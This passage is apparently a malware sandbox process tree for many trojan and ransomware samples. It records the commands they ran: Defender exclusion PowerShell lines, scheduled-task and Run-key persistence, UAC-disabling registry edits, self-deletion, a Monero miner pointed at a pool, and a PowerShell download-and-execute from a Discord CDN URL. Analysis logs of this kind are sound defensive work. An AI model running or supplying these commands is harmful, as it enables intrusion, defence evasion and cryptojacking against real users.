                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                              9⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:8676
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                              9⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:6788
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                            8⤵
                                                                                                              PID:6964
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                9⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Drops file in System32 directory
                                                                                                                PID:2920
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                  10⤵
                                                                                                                    PID:4104
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                      11⤵
                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                      PID:8020
                                                                                                                  • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                    "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                    10⤵
                                                                                                                      PID:7508
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                      10⤵
                                                                                                                        PID:8620
                                                                                                                        • C:\Windows\system32\choice.exe
                                                                                                                          choice /C Y /N /D Y /T 3
                                                                                                                          11⤵
                                                                                                                            PID:2548
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                    7⤵
                                                                                                                      PID:8240
                                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                        8⤵
                                                                                                                          PID:8788
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\@pidoras213124_protected.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\@pidoras213124_protected.exe"
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:1636
                                                                                                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00461\Ебать ты даун.txt
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5192
                                                                                                              • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Cryptos.gen-cc82b6fca5d5414f310e6c41251e2b56a8f9ae5081870e260b47393391810118.exe
                                                                                                                HEUR-Trojan.MSIL.Cryptos.gen-cc82b6fca5d5414f310e6c41251e2b56a8f9ae5081870e260b47393391810118.exe
                                                                                                                3⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:688
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\TEST1(SD 30S)EXP-30-.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\TEST1(SD 30S)EXP-30-.exe"
                                                                                                                  4⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:6992
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                    5⤵
                                                                                                                      PID:6960
                                                                                                                      • C:\WINDOWS\explorer.exe
                                                                                                                        C:\WINDOWS\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmrpool.eu:5555 --user=47ptopaczsjtzabpzgp3jj6rbk6lwbtz3cadehehgganqtenn9gumqrukjrzs57c94aehsrhx8ogpbmxr33px2er7xe1sew --pass= --cpu-max-threads-hint=10 --donate-level=5 --unam-idle-wait=2 --unam-idle-cpu=10 --unam-stealth
                                                                                                                        6⤵
                                                                                                                          PID:4996
                                                                                                                  • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Cryptos.gen-d20b859ea75ab0d401c28ad46c30eae3061180a48621af8b6f8360ccf1e1d042.exe
                                                                                                                    HEUR-Trojan.MSIL.Cryptos.gen-d20b859ea75ab0d401c28ad46c30eae3061180a48621af8b6f8360ccf1e1d042.exe
                                                                                                                    3⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Modifies registry class
                                                                                                                    PID:916
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
                                                                                                                      4⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5168
                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                        5⤵
                                                                                                                          PID:5528
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                            6⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5416
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                            6⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:9104
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                            6⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:7312
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                            6⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:7308
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
                                                                                                                          5⤵
                                                                                                                            PID:9012
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
                                                                                                                              6⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Drops file in System32 directory
                                                                                                                              PID:6644
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                7⤵
                                                                                                                                  PID:7456
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                    8⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:8332
                                                                                                                                • C:\Windows\system32\services32.exe
                                                                                                                                  "C:\Windows\system32\services32.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  PID:7984
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                    8⤵
                                                                                                                                      PID:8220
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                        9⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:8564
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                        9⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:7372
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                        9⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:9204
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                        9⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:6492
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                      8⤵
                                                                                                                                        PID:6848
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          9⤵
                                                                                                                                            PID:6600
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                            9⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            PID:8704
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                              10⤵
                                                                                                                                                PID:7692
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                  11⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:288
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                10⤵
                                                                                                                                                  PID:1300
                                                                                                                                                  • C:\Windows\system32\choice.exe
                                                                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                                                                    11⤵
                                                                                                                                                      PID:8484
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:8088
                                                                                                                                                • C:\Windows\system32\choice.exe
                                                                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                                                                  8⤵
                                                                                                                                                    PID:7084
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5344
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                              5⤵
                                                                                                                                                PID:6108
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                  6⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:5288
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                5⤵
                                                                                                                                                  PID:8400
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                    6⤵
                                                                                                                                                      PID:9012
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                    5⤵
                                                                                                                                                      PID:3612
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                        6⤵
                                                                                                                                                          PID:8856
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                        5⤵
                                                                                                                                                          PID:7432
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                            6⤵
                                                                                                                                                              PID:7128
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                            5⤵
                                                                                                                                                              PID:8488
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:4636
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString(https://cdn.discordapp.com/attachments/875030577231847434/875117973206085692/main_module.txt-chimera-164547.bin')
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1872
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString(https://cdn.discordapp.com/attachments/875030577231847434/875117973206085692/main_module.txt-chimera-164547.bin')
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:8716
                                                                                                                                                              • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00461\ERROR REPORT.txt
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5296
                                                                                                                                                              • C:\Users\Admin\Desktop\00461\HEUR-Trojan.Win32.Crypt.gen-be76d8099188dcd24930e143e92a6c0d0f0e8c55de5dc4c17faec4669ff39802.exe
                                                                                                                                                                HEUR-Trojan.Win32.Crypt.gen-be76d8099188dcd24930e143e92a6c0d0f0e8c55de5dc4c17faec4669ff39802.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:3872
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\setup_install.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\setup_install.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:2308
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sahiba_1.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:5212
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_1.exe
                                                                                                                                                                      sahiba_1.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:2212
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_1.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_1.exe" -a
                                                                                                                                                                        7⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:6812
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sahiba_2.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4848
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_2.exe
                                                                                                                                                                        sahiba_2.exe
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                        PID:5752
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 384
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6804
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sahiba_3.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4424
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_3.exe
                                                                                                                                                                          sahiba_3.exe
                                                                                                                                                                          6⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:5220
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1620
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:7004
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sahiba_4.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:712
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_4.exe
                                                                                                                                                                          sahiba_4.exe
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:924
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sahiba_5.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:6120
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_5.exe
                                                                                                                                                                            sahiba_5.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:5188
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:6140
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_6.exe
                                                                                                                                                                              sahiba_6.exe
                                                                                                                                                                              6⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:4852
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sahiba_7.exe
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:3844
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_7.exe
                                                                                                                                                                                sahiba_7.exe
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4080
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sahiba_8.exe
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5020
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_8.exe
                                                                                                                                                                                    sahiba_8.exe
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:6084
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_8.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS02FB2A09\sahiba_8.exe
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:6648
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 568
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:5448
                                                                                                                                                                            • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Blocker.nbni-b10def0c3321efaf0ec2e529197fd1a853d242359d06186b7c2d8c839ebc9190.exe
                                                                                                                                                                              Trojan-Ransom.Win32.Blocker.nbni-b10def0c3321efaf0ec2e529197fd1a853d242359d06186b7c2d8c839ebc9190.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:1504
                                                                                                                                                                              • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Blocker.nbni-b10def0c3321efaf0ec2e529197fd1a853d242359d06186b7c2d8c839ebc9190.exe
                                                                                                                                                                                Trojan-Ransom.Win32.Blocker.nbni-b10def0c3321efaf0ec2e529197fd1a853d242359d06186b7c2d8c839ebc9190.exe
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:5708
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:3824
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      • Modifies registry key
                                                                                                                                                                                      PID:6836
                                                                                                                                                                              • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Cryptodef.aoo-96897e5d082f5fb4147fe20b44b6de86ff361d0ab981b474811d80ecbfeaa9af.exe
                                                                                                                                                                                Trojan-Ransom.Win32.Cryptodef.aoo-96897e5d082f5fb4147fe20b44b6de86ff361d0ab981b474811d80ecbfeaa9af.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                PID:6280
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\wujek.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\wujek.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6656
                                                                                                                                                                                • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Encoder.ef-386693f5650cbeac2565b7ff0ed7bf1aad130c3ceb6e3228a818cfa11e7dd047.exe
                                                                                                                                                                                  Trojan-Ransom.Win32.Encoder.ef-386693f5650cbeac2565b7ff0ed7bf1aad130c3ceb6e3228a818cfa11e7dd047.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  PID:6924
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00461\t\Executable.bat" "
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:916
                                                                                                                                                                                • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Encoder.nlh-e4fd947a781611c85ea2e5afa51b186de7f351026c28eb067ad70028acd72cda.exe
                                                                                                                                                                                  Trojan-Ransom.Win32.Encoder.nlh-e4fd947a781611c85ea2e5afa51b186de7f351026c28eb067ad70028acd72cda.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:6340
                                                                                                                                                                                • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Encoder.nnk-520bd9ed608c668810971dbd51184c6a29819674280b018dc4027bc38fc42e57.exe
                                                                                                                                                                                  Trojan-Ransom.Win32.Encoder.nnk-520bd9ed608c668810971dbd51184c6a29819674280b018dc4027bc38fc42e57.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:6276
                                                                                                                                                                                • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Encoder.nwj-2624a461f3459a4e0555bd15edbdc83900fdddc8a937f931e06c493c826d34e9.exe
                                                                                                                                                                                  Trojan-Ransom.Win32.Encoder.nwj-2624a461f3459a4e0555bd15edbdc83900fdddc8a937f931e06c493c826d34e9.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5936
                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                      cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6348
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                          PID:8684
                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                        cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:6600
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                            PID:8740
                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                          cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1544
